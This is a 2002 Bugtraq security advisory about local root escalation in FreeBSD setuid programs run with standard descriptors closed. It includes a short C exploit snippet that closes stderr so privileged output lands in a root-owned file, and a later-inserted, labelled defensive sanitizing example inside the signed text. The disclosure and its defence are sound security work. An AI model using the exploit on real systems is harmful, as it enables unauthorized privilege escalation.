[25209] in bugtraq


Pine Internet Advisory: Setuid application execution may give local root in FreeBSD

daemon@ATHENA.MIT.EDU (Patrick Oonk)
Mon Apr 22 17:54:07 2002

Date: Mon, 22 Apr 2002 10:58:25 +0200
From: Patrick Oonk <patrick@pine.nl>
To: bugtraq@securityfocus.com
Cc: vulnwatch@vulnwatch.org
Message-ID: <20020422085825.GG6162@pine.nl>
Reply-To: cert@pine.nl
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Resent-From: patrick@pine.nl
Resent-To: bugtraq@securityfocus.com

-----BEGIN PGP SIGNED MESSAGE-----

 -----------------------------------------------------------------------------
 Pine Internet Security Advisory
 -----------------------------------------------------------------------------
 Advisory ID       : PINE-CERT-20020401
 Authors           : Joost Pol <joost@pine.nl>
 Issue date        : 2002-04-22 
 Application       : Multiple
 Version(s)        : Multiple 
 Platforms         : FreeBSD confirmed, maybe others.
 Vendor informed   : 20020406 
 Availability      : http://www.pine.nl/advisories/pine-cert-20020401.txt
 -----------------------------------------------------------------------------

Synopsis

	It is possible for a local user to execute a suid application with 
	stdin, stdout or stderr closed.

Impact

	HIGH. Local users should be able to gain root privileges. 

Description

	Consider the following (imaginary) suid application:

	-- begin of imaginary code snippet

		#include <stdio.h>

		int main(int argc, char **argv)
		{
			/* opened read/write with root privileges: the stream takes
			   the lowest free descriptor, which is 2 if stderr was closed */
			FILE * f = fopen("/etc/root_owned_file", "r+");

			if(f) {
				/* if fileno(f) == 2, this message lands in the file */
				fprintf(stderr, "%s: fopen() succeeded\n", argv[0]);

				fclose(f);
			}
			return 0;
		}

	-- end of imaginary code snippet
		
	Now, consider the following (imaginary) exploit:

	-- begin of imaginary exploit snippet

		#include <unistd.h>

		int main(void)
		{
			/* fill the descriptor table, then free only slot 2 */
			while(dup(1) != -1); 
			close(2);

			/* the list of execl() arguments must end in a null pointer */
			execl("/path/to/suid_application",
			      "this text will endup in the root_owned_file", (char *)NULL);
			return 1;
		}

	-- end of imaginary exploit snippet

	Exploitation has been confirmed using the S/KEY binaries. 
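	The following is an added example, not part of the advisory or of any
	FreeBSD code: a hypothetical application-level defence that a setuid
	program can apply before it opens anything privileged. It checks that
	descriptors 0, 1 and 2 are open and fills any closed slot with
	/dev/null, so a later open()/fopen() can never be handed a standard
	descriptor. The demo function reproduces the starting state described
	above (stderr closed) and reports which descriptor a subsequent open()
	lands on, with and without the check; the function names and the use
	of /dev/null as the probe file are my own choices.

```c
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/* 1 if fd refers to an open descriptor, 0 if it is closed (EBADF). */
int fd_is_open(int fd)
{
	if (fcntl(fd, F_GETFD) != -1)
		return 1;
	return errno != EBADF;
}

/*
 * Hypothetical defence for a setuid program: make sure descriptors
 * 0, 1 and 2 are open before any privileged file is opened.  Closed
 * slots are filled with /dev/null.  Returns the number of slots
 * repaired, or -1 on failure.
 */
int sanitize_std_fds(void)
{
	int repaired = 0;
	for (int fd = 0; fd <= 2; fd++) {
		if (fd_is_open(fd))
			continue;
		int nfd = open("/dev/null", fd == 0 ? O_RDONLY : O_WRONLY);
		if (nfd < 0)
			return -1;
		if (nfd != fd) {
			/* open() returns the lowest free descriptor, so this
			   only happens if the table changed underneath us */
			close(nfd);
			return -1;
		}
		repaired++;
	}
	return repaired;
}

/*
 * Demonstration: close stderr (the hostile starting state from the
 * advisory), optionally run the defence, then open `path` and report
 * which descriptor it landed on.  Without the defence the file lands
 * on 2, i.e. on "stderr"; with it, on 3 or higher.  The real stderr
 * is restored before returning.  Returns the descriptor number, or
 * -1 if the defence itself failed.
 */
int demo_open_with_stderr_closed(const char *path, int sanitize, int *repaired_out)
{
	int saved = dup(2);	/* so the demo can put stderr back */
	close(2);

	int repaired = 0;
	if (sanitize)
		repaired = sanitize_std_fds();
	if (repaired_out)
		*repaired_out = repaired;

	int landed = open(path, O_RDONLY);
	if (landed >= 0)
		close(landed);

	if (saved >= 0) {
		dup2(saved, 2);
		close(saved);
	}
	return repaired < 0 ? -1 : landed;
}

int main(void)
{
	int rep;
	int a = demo_open_with_stderr_closed("/dev/null", 0, &rep);
	printf("without check: file landed on fd %d\n", a);
	int b = demo_open_with_stderr_closed("/dev/null", 1, &rep);
	printf("with check:    file landed on fd %d (%d slot(s) repaired)\n", b, rep);
	return 0;
}
```

	The check belongs at the very top of main(), before any library
	call that might open a file. It is the user-space counterpart of
	doing the same thing in the kernel's exec path when a set-id binary
	is started, which is where an operating-system level fix belongs,
	since it then covers every setuid program at once.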

Solution

	FreeBSD source trees have been updated on the 21st of April 2002. 
	Please cvsup.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: noconv

iQEVAwUBPMPQffplhmN+UTQRAQE/bggAwkCUhmkv5QUVVE/pUcHIkN26Txa0Pv6T
4q4Iu4TKi6YhJYJ5Jlh0YhlgkurVE7/qAokvxEfdgHQTR68uCPJhDQTKp/9uJ+PG
qt+InMh7NHaOdIvEjcH74D9zxEC14uH+SrXmmmZno601d9mLcBZyKs0ZgOFCBnJr
QToyEgs709xtnbs5OP8iPxn6dhZADMPM9NJbtU2EvkSUqRoDB8H1awUAANI/8RzJ
4HOLDkFOkYFaNFvbYMULStGU5nH9OTHtOuTw7decgHBK6h9H8FhYf8Yn2hMq8wf0
p8/v5m535gPHqoX9HWvfMw2LdIr36mol5K9br9033XrOdIG5itn5aQ==
=AMED
-----END PGP SIGNATURE-----

-- 
 patrick oonk - pine internet - patrick@pine.nl - www.pine.nl/~patrick
 T:+31-70-3111010 - F:+31-70-3111011 - Read news at http://security.nl 
 PGPid A4E74BBF  fp A7CF 7611 E8C4 7B79 CA36  0BFD 2CB4 7283 A4E7 4BBF
 Note: my NEW PGP key is available at http://www.pine.nl/~patrick/
 Excuse of the day: it has Intel Inside
